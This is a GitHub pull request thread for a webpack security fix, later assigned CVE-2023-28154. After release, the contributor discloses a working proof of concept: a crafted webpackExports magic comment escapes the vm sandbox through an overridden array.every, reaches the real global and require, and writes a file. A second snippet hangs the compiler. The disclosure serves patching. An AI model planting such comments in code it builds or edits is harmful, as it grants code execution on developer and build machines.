
security: avoid cross-realm objects #16500

Merged
merged 6 commits into from Dec 5, 2022

Conversation

Jack-Works
Contributor

@Jack-Works Jack-Works commented Nov 22, 2022

What kind of change does this PR introduce?

refactoring: avoid cross-realm object access.

Did you add tests for your changes?

not yet

Does this PR introduce a breaking change?

no

What needs to be documented once your changes are merged?

nothing

@webpack-bot
Contributor

For maintainers only:

  • This needs to be documented (issue in webpack/webpack.js.org will be filed when merged)
  • This needs to be backported to webpack 4 (issue will be created when merged)

@Jack-Works Jack-Works changed the title fix: avoid cross-realm objects refactorr: avoid cross-realm objects Nov 22, 2022
@Jack-Works Jack-Works marked this pull request as ready for review November 22, 2022 03:43
@Jack-Works Jack-Works changed the title refactorr: avoid cross-realm objects refactor: avoid cross-realm objects Nov 22, 2022
@sokra sokra merged commit 4b4ca3b into webpack:main Dec 5, 2022
@sokra
Member

sokra commented Dec 5, 2022

Thanks

@Jack-Works Jack-Works deleted the avoid-cross-realm-object branch December 5, 2022 13:00
kodiakhq bot added a commit to weareinreach/InReach that referenced this pull request Mar 8, 2023

<details>
<summary>webpack/webpack</summary>

### [`v5.76.0`](https://togithub.com/webpack/webpack/releases/tag/v5.76.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.75.0...v5.76.0)

#### Bugfixes

-   Avoid cross-realm object access by [@Jack-Works](https://togithub.com/Jack-Works) in webpack/webpack#16500
-   Improve hash performance via conditional initialization by [@lvivski](https://togithub.com/lvivski) in webpack/webpack#16491
-   Serialize `generatedCode` info to fix bug in asset module cache restoration by [@ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) in webpack/webpack#16703
-   Improve performance of `hashRegExp` lookup by [@ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) in webpack/webpack#16759

#### Features

-   add `target` to `LoaderContext` type by [@askoufis](https://togithub.com/askoufis) in webpack/webpack#16781

#### Security

-   [CVE-2022-37603](https://togithub.com/advisories/GHSA-3rfm-jhwj-7488) fixed by [@akhilgkrishnan](https://togithub.com/akhilgkrishnan) in webpack/webpack#16446

#### Repo Changes

-   Fix HTML5 logo in README by [@jakebailey](https://togithub.com/jakebailey) in webpack/webpack#16614
-   Replace TypeScript logo in README by [@jakebailey](https://togithub.com/jakebailey) in webpack/webpack#16613
-   Update actions/cache dependencies by [@piwysocki](https://togithub.com/piwysocki) in webpack/webpack#16493

#### New Contributors

-   [@Jack-Works](https://togithub.com/Jack-Works) made their first contribution in webpack/webpack#16500
-   [@lvivski](https://togithub.com/lvivski) made their first contribution in webpack/webpack#16491
-   [@jakebailey](https://togithub.com/jakebailey) made their first contribution in webpack/webpack#16614
-   [@akhilgkrishnan](https://togithub.com/akhilgkrishnan) made their first contribution in webpack/webpack#16446
-   [@ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) made their first contribution in webpack/webpack#16703
-   [@piwysocki](https://togithub.com/piwysocki) made their first contribution in webpack/webpack#16493
-   [@askoufis](https://togithub.com/askoufis) made their first contribution in webpack/webpack#16781

**Full Changelog**: webpack/webpack@v5.75.0...v5.76.0

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.

♻ **Rebasing**: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://togithub.com/renovatebot/renovate/discussions) if that's undesired.

---

 - [ ] If you want to rebase/retry this PR, check this box

---

This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://app.renovatebot.com/dashboard#github/weareinreach/InReach).



PR-URL: #278
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
@Jack-Works
Contributor Author

Finally a new release! This PR is actually a security fix. Can I reveal the details now?

@Jack-Works Jack-Works changed the title refactor: avoid cross-realm objects security: avoid cross-realm objects Mar 9, 2023
@alexander-akait
Member

@Jack-Works Yeah, time to update webpack with the security problem

@Jack-Works
Contributor Author

webpack has a feature called magic comments; it looks like this:

```js
import(
  /* webpackChunkName: "my-chunk-name" */
  /* webpackMode: "lazy" */
  /* webpackExports: ["default", "named"] */
  'module'
);
```

This comment can be any arbitrary JavaScript code. It accepts strings, arrays, and RegExps; here is where we dive in. Note: I'll reference the commit before this PR.

webpack executes the magic comment using Node's vm module.

```js
const val = vm.runInNewContext(`(function(){return {${value}};})()`);
```

This is very subtle, it is easy to make a fragile "sandbox", and webpack actually made a mistake here.

```js
importOptions.webpackExports.every(
	item => typeof item === "string"
)
```

Here it accesses the "every" property of an untrusted object and passes a function in. By crafting the following code, we can get access to the real global object:

```js
const source = import(/* webpackExports: ((() => {
    const array = ["a"]
    array.every = function (fun) {
        //                  ~~~ provided by webpack
        const realGlobalThis = fun.constructor('return this')()
        //                     ~~~~~~~~~~~~~~~ the real Function
        const require = realGlobalThis.process.mainModule.constructor.createRequire(realGlobalThis.process.argv[1])
        //    ~~~~~~~ full power! now we can do anything we want.
        const fs = require("fs")
        const path = require("path")
        fs.writeFileSync(path.join(realGlobalThis.process.cwd(), "test.txt"), "oops")
        return Reflect.apply(Array.prototype.every, array, [fun])
    }
    return array
})()) */ './next.js')
```

This PR ensures values from the VM are sanitized by JSON.parse(JSON.stringify(val)). It's still possible to hang the compiler forever by writing the following code, but it's less dangerous.

```js
const source = import(/* webpackExports: ((() => {
    while (true) {}
})()) */ './next.js')
```

@alexander-akait
Member

@Jack-Works Good investigation, thank you. Do you want to open a CVE for it?

@Jack-Works
Contributor Author

Yes, I have already requested one; let's wait.

@ljharb

ljharb commented Mar 10, 2023

@Jack-Works which versions of webpack are affected? Just 5, or also older majors?

@Jack-Works
Contributor Author

@Jack-Works which versions of webpack are affected? Just 5, or also older majors?

Older majors are also affected.

@ljharb

ljharb commented Mar 10, 2023

Given that v4 has ~9.8M downloads/week compared to v5's ~10M, i dearly hope this fix is backported to v4.

@alexander-akait
Member

@ljharb @Jack-Works I think v4 is not affected https://github.com/webpack/webpack/blob/v4.46.0/lib/dependencies/ImportParserPlugin.js

@Jack-Works
Contributor Author

Jack-Works commented Mar 14, 2023

@Jack-Works Good investigation, thank you, do you want to open CVE for it?

it's CVE-2023-28154

@addaleax
Contributor

addaleax commented Mar 15, 2023

@sokra If there’s a related security issue on top of this, what’s the best way to reach out to you privately? (Edit: Reached out to webpack@opencollective.com)

@Suraj-Bhandarkar-S

Will upgrading the webpack version fix the issue?

@alexander-akait
Member

Yes, just update webpack

@jadepam

jadepam commented Mar 16, 2023

@ljharb @Jack-Works I think v4 is not affected https://github.com/webpack/webpack/blob/v4.46.0/lib/dependencies/ImportParserPlugin.js

That's not right, v4 is also affected: see the parseCommentOptions method specifically
https://github.com/webpack/webpack/blob/v4.46.0/lib/Parser.js

@alexander-akait
Member

alexander-akait commented Mar 16, 2023

@jadepam Yeah, looks like it was in another file, we need a backport, we will really soon (today/tomorrow, need a small discussion)

oliverchang pushed a commit to google/osv.dev that referenced this pull request Mar 20, 2023
@akcsi

akcsi commented Mar 28, 2023

@alexander-akait Is Webpack 4 affected by this security issue? If yes, by when do we expect a backport?

@alexander-akait
Member

@akcsi Not really, I wouldn't say it's a vulnerability - you shouldn't build code that you don't trust, for example - val-loader, some plugins and loaders execute code, even require("./code-to-be-executed.js!") will be a problem if you run it on untrusted code...

ob6160 added a commit to guardian/csnx that referenced this pull request Apr 5, 2023
@bpapez

bpapez commented Apr 6, 2023

@alexander-akait Thank you for this answer. Can it at least be said that using webpack 4 has the same risk as webpack <5.76.0 regarding this security issue?

otc-zuul bot pushed a commit to opentelekomcloud-infra/backstage that referenced this pull request Apr 6, 2023
Bump webpack from 5.75.0 to 5.76.1

Bumps webpack from 5.75.0 to 5.76.1.

Release notes
Sourced from webpack's releases.

v5.76.1
Fixed

Added assert/strict built-in to NodeTargetPlugin

Revert

Improve performance of hashRegExp lookup by @​ryanwilsonperkin in webpack/webpack#16759

Reviewed-by: Artem Goncharov
@devd88

devd88 commented Jun 21, 2023

Good find @Jack-Works !

From an exploitability perspective, does this only affect build process / machine / runner? My interpretation of the above is that an attacker would have to submit malicious input into the repo / CI/CD and it would only get executed at build time, on the build machine / runner. After webpack runs, the remaining static js bundles would not include any malicious code, right?

I noticed that your CVE was scored with network attack vector in NVD. https://nvd.nist.gov/vuln/detail/CVE-2023-28154
Can you help us understand where an attacker needs to be to exploit this? Did you select network because an attacker can submit code to github? The exploit would only be triggered by existing build process on the build machine / runner, right?

@Jack-Works
Contributor Author

Good find @Jack-Works !

From an exploitability perspective, does this only affect build process / machine / runner? My interpretation of the above is that an attacker would have to submit malicious input into the repo / CI/CD and it would only get executed at build time, on the build machine / runner. After webpack runs, the remaining static js bundles would not include any malicious code, right?

This attack requires that the code being compiled is already malicious (therefore the output may not be clean already). Yes, it only attacks the builder, but the developer's computer is also a builder.

Did you select network because an attacker can submit code to github? The exploit would only be triggered by existing build process on the build machine / runner, right?

Yes. Yes.

kodiakhq bot pushed a commit to X-oss-byte/Canary-nextjs that referenced this pull request Sep 18, 2023
Projects
Status: Shipped